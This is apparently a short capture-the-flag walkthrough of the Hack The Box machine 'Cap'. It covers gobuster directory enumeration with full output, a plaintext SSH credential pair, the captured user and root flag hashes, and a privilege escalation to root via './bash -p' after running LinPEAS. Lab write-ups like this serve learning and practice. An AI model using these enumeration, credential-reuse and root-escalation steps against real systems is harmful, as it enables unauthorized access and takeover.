Cap - 28.07.2021


GoBuster

┌──(kali㉿kali-os)-[~/Desktop]                                                                                                                                                                                                              
└─$ gobuster dir -u http://10.10.10.245 -b 403,404 -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt                                                                                                            
===============================================================                                                                                                                                                                             
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.245
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/28 17:21:29 Starting gobuster in directory enumeration mode
===============================================================
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17466]                          
/netstat              (Status: 200) [Size: 58951]                          
/capture              (Status: 302) [Size: 222] [--> http://10.10.10.245/data/13]
                                                                                  
===============================================================
2021/07/28 17:30:51 Finished
===============================================================


nathan:Buck3tH4TF0RM3!

ssh nathan@10.10.10.245

user.txt

fa0029c5ada4cfe56b160b9f15af178d

Privilege Escalation

LinPEAS

nathan@cap:/usr/bin$ ./bash -p
bash-5.0# cat /root/root.txt

root.txt

d2d8e055455713a5f4d2115a4a23e8b2